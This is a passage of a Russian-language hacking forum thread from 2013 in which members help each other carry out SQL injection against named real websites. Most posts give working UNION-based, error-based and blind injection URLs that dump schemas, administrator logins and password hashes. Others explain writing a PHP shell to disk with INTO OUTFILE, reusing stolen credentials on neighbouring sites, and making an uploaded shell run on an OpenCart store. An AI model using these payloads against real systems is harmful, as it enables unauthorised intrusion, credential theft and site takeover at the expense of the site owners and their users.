- http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()
на выходе имею такую связку (таблица - user, столбцы - userName,userPass)
ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from users
и получаю:
Invalid query: Unknown column 'userPass' in 'field list'
Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её
YaBTR
и вот вариант рабочий:
ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,group_concat(
userpwd,0x3a,user rights
),version(),4,5+from+users--
Где и как найти эти
userpwd,0x3a,user rights




Code:
http://terrapex.ca/en/realisation.php?larealisation=x&id=(16)and(0)union+select+1,(select(@x)from(select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))x),3,4,5,6--+



Code:
http://terrapex.ca/en/realisation.php?larealisation=x&id=(16)and(0)union+select+1,(select(@x)from(select (@x:=0x00),(select(0)from(web_terrapex_ca.intranet users)where(0x00)in(@x:=concat(@x,0x3c62723e,userN ame,0x3a,userPass))))x),3,4,5,6--+



Code:
http://terrapex.ca/en/realisation.php?larealisation=x&id=(16)and(0)union+select+1,(select(@x)from(select (@x:=0x00),(select(0)from(web_terrapex_ca.users)wh ere(0x00)in(@x:=concat(@x,0x3c62723e,userrights,0x 3a,userpwd))))x),3,4,5,6--+

qaz
12.07.2013, 00:33
хтонить в курсе, есть ли в БД ждомлы запись о том какой домен пренадлежит базе? ато так пробежался и ничего путного не нашол

Га-Ноцри
12.07.2013, 04:06
qaz said:
хтонить в курсе, есть ли в БД ждомлы запись о том какой домен пренадлежит базе? ато так пробежался и ничего путного не нашол


Точный адрес в БД Jooml'ы не прописан, наксколько мне известно, но возможно возможно подскажет следующее:

1. Select email from jos_users where usertype='Super Administrator'

Смотрим мыло админа, довольно часто бывает что в названии админского мыла указывается источник на домен, например admin@искомый_домен.com. Если же нет, и там просто мыло типа mail.ru, то можно пройти сюда 2ip.ru/domain-list-by-email/, вести полученное мыло, и если повезет и поиск выдаст какие-то домены, найти те, сайты которых на Jooml'e. Возможно искомый домен окажется в этом списке.

2. Select title from jos_categories

Получаем заголовки страниц, хранящихся в БД. Далее идем в гугл и составляем поисковый запрос, что-то типа intitle:"Полученный title". Опять таки, если повезет, то в выдаче гугла можно найти сайт по искомому заголовку.

3. Просто посмотреть на сайты, находящиеся на этом ip, если их там не много, и не влом этим заниматься, то отсеять все, которые не на Jooml'e, ну а в оставшиеся попытаться войти, используя полученные данные из jos_users. Авось повезет.

Но, это все конечно не панацея и не дает 100% результат в поиске искомого домена. Так, информация к размышлению, скорее

Sat-hacker
12.07.2013, 20:46
Подскажите возможно ли как-то автоматически скопировать все ссылки сайтов из гугла по определённому запросу,чтоб не копировать всё по одному?Спасибо.

Sat-hacker
12.07.2013, 23:01
Никто не в курсе?

qaz
12.07.2013, 23:04
Sat-hacker said:
Никто не в курсе?


пишешь скрипт парсера выдачи и парсишь, проблем?

qaz
13.07.2013, 23:41
Га-Ноцри said:
Точный адрес в БД Jooml'ы не прописан, наксколько мне известно, но возможно возможно подскажет следующее:
1. Select email from jos_users where usertype='Super Administrator'
Смотрим мыло админа, довольно часто бывает что в названии админского мыла указывается источник на домен, например admin@искомый_домен.com. Если же нет, и там просто мыло типа mail.ru, то можно пройти сюда 2ip.ru/domain-list-by-email/, вести полученное мыло, и если повезет и поиск выдаст какие-то домены, найти те, сайты которых на Jooml'e. Возможно искомый домен окажется в этом списке.
2. Select title from jos_categories
Получаем заголовки страниц, хранящихся в БД. Далее идем в гугл и составляем поисковый запрос, что-то типа intitle:"Полученный title". Опять таки, если повезет, то в выдаче гугла можно найти сайт по искомому заголовку.
3. Просто посмотреть на сайты, находящиеся на этом ip, если их там не много, и не влом этим заниматься, то отсеять все, которые не на Jooml'e, ну а в оставшиеся попытаться войти, используя полученные данные из jos_users. Авось повезет.
Но, это все конечно не панацея и не дает 100% результат в поиске искомого домена. Так, информация к размышлению, скорее



ммм, сенкс, а в phpbb есть чёнибуть для наводки?

Га-Ноцри
14.07.2013, 04:48
qaz said:
ммм, сенкс, а в phpbb есть чёнибуть для наводки?


В случае с phpbb все гораздо прозрачнее.


PHP:
SELECT config_value FROM phpbb_config WHERE c onfig_name='server_name'

Получаем домен, на котором расположен форум.


PHP:
SELECT config_value FROM phpbb_config WHERE c onfig_name='script_path'

Получаем конечную папку с форумом, доступную из веба.

Voinmraka
15.07.2013, 02:11
При подстановке разных параметров в значения через POST, увидел такую ошибку


PHP:
INSERT INTO`ap_form_0` (`ip_address`,`date_creat ed`)VALUES('мой ip','2013-07-14 15:59:15');Query failed:Table'formy.ap_form_0 'doesn't exist

это ошибка возникает если подставить "-" в параметр, если кавычку то все работает без ошибок, как то можно что то с этим сделать, и как я понял он не может найти указанную таблицу, то есть если и можно, то придется подбирать имя таблицы и поля?

Inoms
15.07.2013, 02:34
Voinmraka said:
то придется подбирать имя таблицы и поля?


Если эти значения, включая и ип передаются через POST, можно попробовать вручную вызвать ошибку, в которой будет выведена интересующая информация, конечно если там и ' не фильтруются.

Voinmraka
15.07.2013, 02:56
какие бы я запросы не вводил в уязвимый параметр все равно все остается также как я написал выше, разве что время меняется...


PHP:
SELECT*FROM`ap_form_-1_review`WHERE id=''Query failed:Table'zodiacsi_ formy.ap_form_-1_review'doesn't exist

еще нашел вот это... есть параметр id= если туда ввести значение -1 то выйдет вот это

BigBear
16.07.2013, 08:52
Voinmraka said:
какие бы я запросы не вводил в уязвимый параметр все равно все остается также как я написал выше, разве что время меняется...

PHP:
SELECT*FROM`ap_form_-1_review`WHERE id=''Query failed:Table'zodiacsi_ formy.ap_form_-1_review'doesn't exist

еще нашел вот это... есть параметр id= если туда ввести значение -1 то выйдет вот это


Хм, интересный случай... А если ввести так...


Code:
Сначала поищем количество полей в таблице

ap_form_1_review

id=1` order by 1 --

id=1` order by 100 --

id=1` union select 1,2,3,4,5 --

Ну или попробовать вариант с error-based


Code:
id=1` union select * from(select * from(select NAME_CONST((select version()), 14)d) as t join (select NAME_CONST((select version()), 14)e) b)a --

А вообще хотелось бы увидеть линк в ПМ, можно поэкспериментировать...

XAMEHA
16.07.2013, 09:01
BigBear said:
Хм, интересный случай... А если ввести так...

Code:
Сначала поищем количество полей в таблице

ap_form_1_review

id=1` order by 1 --

id=1` order by 100 --

id=1` union select 1,2,3,4,5 --



Так же не будет работать, если правильную таблицу указать, например:


Code:
id=1_review` SQL -- 1

Voinmraka, у вас же инъекция в имени таблицы...

BigBear
16.07.2013, 11:41
XAMEHA said:
Так же не будет работать, если правильную таблицу указать, например:

Code:
id=1_review` SQL -- 1

Voinmraka
, у вас же инъекция в имени таблицы...


SELECT * FROM `ap_form_-1_review`

Хм, точно, просмотрел что там ещё окончание таблицы дописывается.

Ну значит просто добавлять

id=1_review` order by 1 --

и по аналогии

Грабитель
17.07.2013, 08:00
Подскажите пожалуйста, как в MySQL выполнить запрос into outfile в такой конструкции:

script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+version()))))

Имею мускуль рута и не экранирующиеся кавычки, команда load_file() работает нормально, но как только я пытаюсь сделать следующий запрос:

script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+user+from+table+into+outfile+'C:\tmp\test .php')))) мускуль мне выдаёт ошибку:


Code:
...блаблабла MySQL server version for the right syntax to use near 'into outfile 'C:\tmp\test.php'))))and'

На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае?

XAMEHA
17.07.2013, 08:44
Грабитель said:
На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае?


Нет смысла использовать extractvalue при записи(При чтении - да) в файл в error-based инъекциях, дейлайте как это обычно делается...

BigBear
17.07.2013, 08:50
Грабитель said:
Подскажите пожалуйста, как в MySQL выполнить запрос into outfile в такой конструкции:
script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+version()))))
Имею мускуль рута и не экранирующиеся кавычки, команда load_file() работает нормально, но как только я пытаюсь сделать следующий запрос:
script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+user+from+table+into+outfile+'C:\tmp\test .php')))) мускуль мне выдаёт ошибку:

Code:
...блаблабла MySQL server version for the right syntax to use near 'into outfile 'C:\tmp\test.php'))))and'

На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае?


Насколько я помню, при extractvalue не действует способ into outfile.

Попробуй так


Code:
or (select count(*) from (select 1 union select 2 union select 3)x group by concat((select 1 into outfile '/usr/home/www/test.php' lines terminated by ""),floor(rand(0)*2)))

Судя по всему с пробелами у тебя запара. Но, думаю, в "скобочный" вариант переделать сам сможешь.

kcash
19.07.2013, 23:52
Есть доступ к сайту через Phpmyadmin пользователь sa что там можно сделать? Injection в сам PHPMYADMIN можно затеять?

MaxFast
20.07.2013, 00:28
kcash said:
Есть доступ к сайту через Phpmyadmin пользователь sa что там можно сделать? Injection в сам PHPMYADMIN можно затеять?


Если есть права на запись, то можно залить минишелл.

winstrool
20.07.2013, 08:26
kcash said:
Есть доступ к сайту через Phpmyadmin пользователь sa что там можно сделать? Injection в сам PHPMYADMIN можно затеять?


Тут зависит от версии Phpmyadmin. Узнаешь версию и идешь в гугл за поиском експлоита, в гугле так и пишешь:exploit phpmyadmin

внекоторых версиях встречается такая уязвимость как php-Injection

rogatiy
22.07.2013, 10:54
http://www.drive-direct.ru/?go=servis&catid=38

Руками крутить скули, к сожалению, уже разучился. Havij принимает это за Blind-inj, а потом не может вытащить не таблицы, ни колонки. Вопрос - действительно ли это блайнд-инжект и крутится ли он?

BigBear
22.07.2013, 14:02
rogatiy said:
http://www.drive-direct.ru/?go=servis&catid=38
Руками крутить скули, к сожалению, уже разучился. Havij принимает это за Blind-inj, а потом не может вытащить не таблицы, ни колонки. Вопрос - действительно ли это блайнд-инжект и крутится ли он?


Инъекция тут точно есть, 7 колонок в запросе.

Есть WAF. Пока даже версию не смог получить. Но пытаюсь.

Ну в общем это 3-я ветка MySQL


Code:
http://www.drive-direct.ru/?go=servis&catid=38+and+if((left(version(),1)=3),1,0)=1-- TRUE

vanban
22.07.2013, 15:06
BigBear said:
Инъекция тут точно есть, 7 колонок в запросе.
Есть WAF. Пока даже версию не смог получить. Но пытаюсь.
Ну в общем это 3-я ветка MySQL

Code:
http://www.drive-direct.ru/?go=servis&catid=38+and+if((left(version(),1)=3),1,0)=1-- TRUE



Бд: MySQL 3

Название: 1gb_drivedir

kcash
22.07.2013, 17:49
Вобщем постоянно натыкаюсь на одно и то же.. что хавиж, что sqlmap.. находим time-based инъекцию. но потом нещадно губит надежды нежеланием даже на уровне раскрытия таблиц. Т.е. иммя базы сказала, и вроде должно пойти но, не может почему-то.. то что у всех так установлены права на sql юзеров не поверю

[16:34:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[16:34:43] [INFO] retrieved:

[16:34:46] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..

[16:35:01] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[16:35:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[16:35:03] [CRITICAL] unable to retrieve the number of database users

это я юзерс хотел посмотреть.... собственно с этого всё начинается

Br@!ns
22.07.2013, 20:22
При заходе на опредленную страничку, ничего не добавляя мне выкидывает "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/search.php on line 14" Можно ли это как нибудь использовать?

qaz
22.07.2013, 20:24
Br@!ns said:
При заходе на опредленную страничку, ничего не добавляя мне выкидывает "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/search.php on line 14" Можно ли это как нибудь использовать?



нет!

Br@!ns
22.07.2013, 21:01
хорошо) а даст ли нам что нибудь, если при вводе в строку поиска ковычки, нам выдаст ошибку sql syntax:

"DB query error.

Details: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 3

Please try later."

Какие дальше стоит пути рассматривать? сразу искать что нибудь другое? или можно тут что либо попробовать?

InDuStRieS
22.07.2013, 21:06
Br@!ns said:
хорошо) а даст ли нам что нибудь, если при вводе в строку поиска ковычки, нам выдаст ошибку sql syntax:
"DB query error.
Details: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 3
Please try later."
Какие дальше стоит пути рассматривать? сразу искать что нибудь другое? или можно тут что либо попробовать?


ордер бай потом селект

если фильтры не режут

[AVT]
22.07.2013, 22:21
Что-то интересное:

senpolia.info/news/79'/

trololoman96
22.07.2013, 23:17
По той ссылке нет ничего.

Но кое что забавное есть в другом месте:

http://senpolia.info/catalog/1111111111111111111111111111f1111111111111/

http://senpolia.info/catalog/1111111111111111111111111111f1111111111111/sad

вылетают sql ошибки. Притом если поставить в запрос один из символов '(),=+ ошибки уже нет

Га-Ноцри
23.07.2013, 00:00
"]
[AVT] said:
Что-то интересное:
senpolia.info/news/79'/


Как вариант.

http://rghost.net/private/47599560/44bd9895a518837d08d84f61699a57f1/image.png

rogatiy
23.07.2013, 17:10
http://www.yacht-master.ru/board/viewphoto.php?p=203

http://www.windsurf.ru/board/viewphoto.php?&p=4885

В обоих случаях морковка вытягивает блайндом имя базы и затухает - таблицы вытащить не удаётся. Крутится ли оно руками?

BigBear
23.07.2013, 17:52
rogatiy said:
http://www.yacht-master.ru/board/viewphoto.php?p=203
http://www.windsurf.ru/board/viewphoto.php?&p=4885
В обоих случаях морковка вытягивает блайндом имя базы и затухает - таблицы вытащить не удаётся. Крутится ли оно руками?


Вполне крутабельны.

1-ый линк:


Code:
http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,@@version,3,4,5,6,7,8+--+

2-ой линк:


Code:
http://www.windsurf.ru/board/viewphoto.php?&p=-99999'+union+select+1,@@version,3,4,5,6,7,8+--+

rogatiy
23.07.2013, 19:34
Благодарю! Сработало.

Хотелось бы вытащить аккаунты администраторов, благо группа для них имеется отдельная.


Code:
http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,U_Status,3,4,5,6,7,8+from+w 3t_Users+--+

Как отфильтровать U_Username по U_Status='Administrator'?

Ответ:


Code:
http://yacht-master.ru/board/viewphoto.php?&p=-99999'+union+select+1,U_Password,3,4,5,6,7,8+from+ w3t_Users+where+U_Status='Administrator'+--+

InDuStRieS
23.07.2013, 19:35
rogatiy said:
Благодарю! Сработало.
Хотелось бы вытащить аккаунты администраторов, благо группа для них имеется отдельная.

Code:
http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,U_Status,3,4,5,6,7,8+from+w 3t_Users+--+

Как отфильтровать U_Username по U_Status='Administrator'?


используй where

rogatiy
24.07.2013, 23:45
http://carptackle.ru/plugins/shop/features.php?product=1573

MySQL >5, есть information_schema

Морковка видит blind-inj, не может вытащить user_login из msk_user. Помогите, пожалуйста, подобрать кол-во колонок

antiaudomain
25.07.2013, 00:05
rogatiy said:
http://carptackle.ru/plugins/shop/features.php?product=1573
MySQL >5, есть information_schema
Морковка видит blind-inj, не может вытащить user_login из msk_user. Помогите, пожалуйста, подобрать кол-во колонок


39 же


Code:
http://carptackle.ru/plugins/shop/features.php?product=1573+and+1=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39--

смотри тайтл

1NtR0
26.07.2013, 07:07
Есть скуля, на сайте таблица размеров в 2 млн записей


SELECT COUNT(field) FROM table WHERE LENGTH(field)>4


Показывает 2млн записей

Пробую дампить через LIMIT 0,1, дохожу до 80(LIMIT 80,1) и все, дальше данные не выводяться, в чем может быть проблема?

BigBear
26.07.2013, 07:25
1NtR0 said:
Есть скуля, на сайте таблица размеров в 2 млн записей
Показывает 2млн записей
Пробую дампить через LIMIT 0,1, дохожу до 80(LIMIT 80,1) и все, дальше данные не выводяться, в чем может быть проблема?


Встречал пару раз такие случаи, попробуй вместо limit использовать where или having.

Для having обязательное условие наличие колонки в group by

Улыбайся
27.07.2013, 22:00
Наткнулся на roundcube при вставки логина пишет вот что:

IMAP Error in /usr/local/www/apache22/data/roundcube/program/include/rcube_imap.php (205): Login failed for 'or''=' from 177.167.126.19. LOGIN: Login failed.

можно что то сделать?

nicols
27.07.2013, 22:34
Помогите новичку:

1.На сайте есть скуля,раскрутил но в БД нету логина админа,где он может храниться?

2.Так же есть логин и пароль юзера(root@localhost) бд, но не знаю как подключиться(При переходе на site.com/PMA/ пришет 403 Forbidden(( и ниче сделать не могу ) .

3.У юзера бд File_Priv=Y,читать файлы могу, но некак не могу залить шелл,везде пишет Can't create/write to file '....' (Errcode: 13)

Также на сайте имееться файл phpinfo.php . Может он что-то подскажет...

winstrool
27.07.2013, 23:04
nicols said:
Помогите новичку:
1.На сайте есть скуля,раскрутил но в БД нету логина админа,где он может храниться?
2.Так же есть логин и пароль юзера(root@localhost) бд, но не знаю как подключиться(При переходе на site.com/PMA/ пришет 403 Forbidden(( и ниче сделать не могу ) .
3.У юзера бд File_Priv=Y,читать файлы могу, но некак не могу залить шелл,везде пишет Can't create/write to file '....' (Errcode: 13)
Также на сайте имееться файл phpinfo.php . Может он что-то подскажет...


Можешь попробовать удаленно подключиться к БД, можешь найти относительный путь соседних сайтов и прям со скули залиться в них, если пасса нет в БД, но есть админка, прочитай исходники админки и посмотри откуда он берет данные от пасса. с такой скуляй много чего придумать можно, все по ситуации.

Storm87
28.07.2013, 15:21
Кто знает про вредоносную программу ZmEu - ищет уязвимости? Подскажите как работает?

qaz
28.07.2013, 15:32
Storm87 said:
Кто знает про вредоносную программу ZmEu - ищет уязвимости? Подскажите как работает?


никто не знает, тут гавнософтом не пользуются, только ручками

Storm87
28.07.2013, 15:49
вот-эта чудо прога ломанула сервачок! надо мне её вычислить! для этого надо знать как она работает! верно?

попугай
28.07.2013, 17:01
Storm87 said:
вот-эта чудо прога ломанула сервачок! надо мне её вычислить! для этого надо знать как она работает! верно?



Смотри логи - все станет понятно

nicols
28.07.2013, 17:49
winstrool said:
Можешь попробовать удаленно подключиться к БД, можешь найти относительный путь соседних сайтов и прям со скули залиться в них, если пасса нет в БД, но есть админка, прочитай исходники админки и посмотри откуда он берет данные от пасса. с такой скуляй много чего придумать можно, все по ситуации.


В том то и дело,что я не могу подключиться к БД, но имею логин и пароль к БД. Может кто знает,как можно подключиться к БД удаленно.

И еще один вопрос:где в линуксе может храниться входы в админку сайта?

Shelling
28.07.2013, 17:58
подключится к бд можно тем же шеллом всо залитым на любой хост там есть клиент

пассы на вход в админку могут быть где угодно в базе или в файле и от ос(линукс,вин)тут вообще не зависит

nicols
28.07.2013, 18:11
Shelling said:
подключится к бд можно тем же шеллом всо залитым на любой хост там есть клиент
пассы на вход в админку могут быть где угодно в базе или в файле и от ос(линукс,вин)тут вообще не зависит


Хорошо,а если вход в пхпмайадмин по этой ссылке site.com/PMA/ то что в host писать ( site.com/PMA/ или site.com/ ?


Shelling said:
пассы на вход в админку могут быть где угодно в базе или в файле и от ос(линукс,вин)тут вообще не зависит


А где в Линуксе они хроняться?

Shelling
28.07.2013, 20:24
в хост писать имя сайта но не всегда мускул находиться на том же сервере на пример на мастрехосте это другой сервер по этому лучше прочитайте конфиг какойнибудь если найдёте

exstreme
29.07.2013, 03:13
привет всем

есть SQL Inject, помогите раскрутить.


Code:
GET /junior/88/matches/stage/SQLInject/ HTTP/1.1
Referer: http://allhockey.ru:80/

На сайте фильтруются пробелы,все что пока получилось


Code:
/junior/88/matches/stage/'-1'UNION(SELECT(null),'test',3,4,(INTO(OUTFILE)'tes t.html))/

Подправьте, что не так или посоветуйте другие варианты

n3m1s
29.07.2013, 19:55
Каким образом можно создать площадку для проведения атаки на буфер обмена?

Нужна именно страница с таким кодом (на PHP), чтобы при запросе с определённым значением происходило переполнение буфера, вследствии чего появлялась ошибка (403, 228 etc.).

Проверка входящего запроса на наличие значение не пойдёт.

Unknowhacker
29.07.2013, 21:50
сайт.com/index.php?hl=ru&idd=cat&cat='

Добавив в конце кавычку выдало следующую ошибку:


Code:
Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT * FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id='' ORDER BY mbmproduct.name ASC LIMIT 0,9

Или всё-таки должно выдать You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

Inoms
29.07.2013, 21:57
Unknowhacker said:
сайт.com/index.php?hl=ru&idd=cat&cat=
'
Добавив в конце кавычку выдало следующую ошибку:

Code:
Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT * FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id='' ORDER BY mbmproduct.name ASC LIMIT 0,9

Или всё-таки должно выдать
You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1''


Вывод ошибок зависит от реализации выборки данных с бд, или конфигурации php.

1,2) or 1=1 order by 10000 -- w - что выдаст ?

Unknowhacker
29.07.2013, 23:25
Inoms said:
Вывод ошибок зависит от реализации выборки данных с бд, или конфигурации php.
1,2) or 1=1 order by 10000 -- w - что выдаст ?


Ничего. Фильтрует


Code:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27

Inoms
30.07.2013, 00:49
Unknowhacker said:
Ничего. Фильтрует

Code:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27



Это слепая sql.

Её бессмысленно крутить, только по-символьно вытаскивать данные -

http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=1%29%20or%201=1%20and%20substring%28%28version %28%29%29,1,1%29=5%20%23w

Если что-то равно чему-то, в данном случае, первый символ версии субд=5 - выведет каталог), если нет - пустоту.

Или при лучших обстоятельствах сделать вывод мини-шелла в диру с сайтом при соответствующих привилегиях и правах.

er9j6@
30.07.2013, 00:55
Unknowhacker said:
Ничего. Фильтрует

Code:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27



Так еще можно сделать

http://www.nova-plosha.com/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1,2,3,(select(@x)fro m(select(@x:=0x00),(select(null)from(information_s chema.columns)where(table_schema!=0x696e666f726d61 74696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0 x3c62723e,table_schema,0x2e,table_name,0x3a,column _name))))x),5,6,7,8,9,10,11,12,13,14,15,16+--+

Unknowhacker
30.07.2013, 01:49
er9j6@ said:
Так еще можно сделать
http://www.nova-plosha.com/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1,2,3,(select(@x)fro m(select(@x:=0x00),(select(null)from(information_s chema.columns)where(table_schema!=0x696e666f726d61 74696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0 x3c62723e,table_schema,0x2e,table_name,0x3a,column _name))))x),5,6,7,8,9,10,11,12,13,14,15,16+--+


Та я сморю бессмысленно это URL-запрос в код "отражает" и всё..

P.S Но чувствую что там есть "дырочка", квалификации знаний не хватает

YaBtr
30.07.2013, 06:48
Unknowhacker said:
Та я сморю бессмысленно это URL-запрос в код "отражает" и всё..
P.S Но чувствую что там есть "дырочка", квалификации знаний не хватает



Бессмысленности здесь нет!

er9j6@ привел способ вывода данных в формате


table_schema table_name column _name


через принтабельное поле.

p.s. уберите лишние пробелы

Unknowhacker
30.07.2013, 10:22
YaBtr said:
Бессмысленности здесь нет!
er9j6@
привел способ вывода данных в формате
через принтабельное поле.
p.s. уберите лишние пробелы


Ах, да извиняюсь честно слово, синтаксис не глянул. Пробелы убрал и действительно имена таблиц по выскакивали:

http://s10.postimg.org/lnifmfhxl/image.jpg

Убрав Восклицательный Знак в синтаксисе (table_schema!) я получил немного другой вид.. но правда это было не утешительно таблицы: dbrootgroupid; dblogin; dbpasswd; dbmail - исчезли

exstreme
30.07.2013, 12:57
Что значит данная ошибка, или скорее как ее подправить, чтобы работало?


Code:
ERROR: UNION types integer and text cannot be matched LINE 1



Code:
UNION(SELECT(version()),version(),version(),versio n(),(version()))

YaBtr
30.07.2013, 21:37
Unknowhacker said:
Ах, да извиняюсь честно слово, синтаксис не глянул. Пробелы убрал и действительно имена таблиц по выскакивали:
Убрав Восклицательный Знак в синтаксисе (
table_schema
!) я получил немного другой вид.. но правда это было не утешительно таблицы: dbrootgroupid; dblogin; dbpasswd; dbmail - исчезли


Извлечь можно:


http://
www.nova-plosha.com
/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1,2,3,(select(@x)fro m(select(@x:=0x00),(select(0)from(novaplosha.wbwus er)where(0x00)in(@x:=concat(@x,0x3c62723e,dblogin, 0x3a,dbpasswd))))x),5,6,7,8,9,10,11,12,13,14,15,16 +--+

Unknowhacker
31.07.2013, 16:46
YaBtr said:
Извлечь можно:


СпасибО!

TRX.new
31.07.2013, 22:50
Подвержен ли данный код LFI ?

В папке "../../download" лежит шелл, как его проинклудить через


PHP:
$route

?


PHP:
public function__construct($route,$args= array() ) {

$path='';



$parts=explode('/',str_replace('../','', (string)$route));



foreach ($partsas$part) {

$path.=$part;



if (is_dir(DIR_APPLICATIO N.'controller/'.$path)) {

$path.='/';



array_shift($parts);



continue;

}



if (is_file(DIR_APPLICATI ON.'controller/'.str_replace('../','',$path) .'.php')) {

$this->file=DIR_APPLICATION.'controller/'.str_replace('../','',$path) .'.php';



$this->class='Controller'.preg_replace('/[^a-zA-Z0-9]/','',$path);

array_shift($parts);



break;

}

}



if ($args) {

$this->args=$args;

}



$method=array_shift($parts);



if ($method) {

$this->method=$method;

} else {

$this->method='index';

}

}



public functiongetFile() {

return$this->file;

}



public functiongetClass() {

return$this->class;

}



public functiongetMethod() {

return$this->method;

}



public functiongetArgs() {

return$this->args;

}

}

XAMEHA
01.08.2013, 09:30
TRX.new, Если можно использовать Windows-слэши, то используйте их, с UNIX-слэшами никак нельзя(Предполагается, что $this->file попадает в инклуд).

TRX.new
01.08.2013, 13:36
XAMEHA said:
TRX.new
, Если можно использовать Windows-слэши, то используйте их, с UNIX-слэшами никак нельзя(Предполагается, что
$this->file
попадает в инклуд).


Вот сюда в итоге попадает $file


PHP:
private functionexecute($action) {

$file=$action->getFile();

...

if (file_exists($file)) {

require_once($file);

Виндовые слеши не отрабатывают, т.к. все на Linux.

Тогда такой вопрос: есть два разных сервака. На одном OpenCart 1.5.3.1 на другом 1.5.2.1. Методами, описанными в статье waraxe, я залил файл на оба сервера в папку download , но на 1.5.3.1 shell выполняется , а на 1.5.2.1 нет. Причем стоит заметить что я заливаю файл test.php.jpg , на сервере имя формируется так test.php.jpg.{md5(mt_rand())}. Имя файла на сервере узнать легко, поэтому это не проблема. Задача на сервере с 1.5.2.1 выполнить shell , но там получаю файл как картинку.

Версия PHP на обоих серваках : 5.2.17

Также в корне сайта есть php.ini

1.5.3.1 :


Code:
magic_quotes_gpc = Off;
register_globals = off;
default_charset = UTF-8;
memory_limit = 64M;
max_execution_time = 18000;
upload_max_filesize = 999M;
safe_mode = Off;
mysql.connect_timeout = 20;
session.use_cookies = On;
session.use_trans_sid = Off;
session.gc_maxlifetime = 12000000;
allow_url_fopen = on;
display_errors = 1;
error_reporting = E_ALL;

1.5.2.1:


Code:
magic_quotes_gpc = Off;
magic_quotes_runtime = Off;
magic_quotes_sybase = Off;
register_globals = Off;
default_charset = UTF-8;
memory_limit = 64M;
max_execution_time = 18000;
upload_max_filesize = 999M;
safe_mode = Off;
mysql.connect_timeout = 20;
session.use_cookies = On;
session.use_trans_sid = Off;
session.gc_maxlifetime = 12000000;
allow_url_fopen = on;
date.timezone = Asia/Yekaterinburg;
;display_errors = 1;
;error_reporting = E_ALL;

Не думаю, что они положили отдельный файлик .htaccess в папку download.

Цель : выполнить shell на серве с 1.5.2.1

XAMEHA
01.08.2013, 16:01
Тогда такой вопрос: есть два разных сервака. На одном OpenCart 1.5.3.1 на другом 1.5.2.1. Методами, описанными в статье waraxe, я залил файл на оба сервера в папку download , но на 1.5.3.1 shell выполняется , а на 1.5.2.1 нет.


Это уже вопрос по другому коду, вы уверены что он один и тот-же? Можно его, а так-же ссылку на эту статью?

По инклуду вердикт однозначный - с использованием UNIX-слэшей спуск невозможен. Набросал тут кое-что на эту тему: https://forum.antichat.net/thread390482.html

TRX.new
01.08.2013, 16:32
XAMEHA said:
Это уже вопрос по другому коду, вы уверены что он один и тот-же? Можно его, а так-же ссылку на эту статью?
По инклуду вердикт однозначный - с использованием UNIX-слэшей спуск невозможен. Набросал тут кое-что на эту тему: https://forum.antichat.net/thread390482.html


Спасибо большое. Статья вот: http://www.waraxe.us/advisory-84.html

Это для версии 1.5.2.1 , но применил и к 1.5.3.1 (и здесь то как раз работает, я получил рабочий шелл). В случае с 1.5.2.1 шелл грузится как изображение.

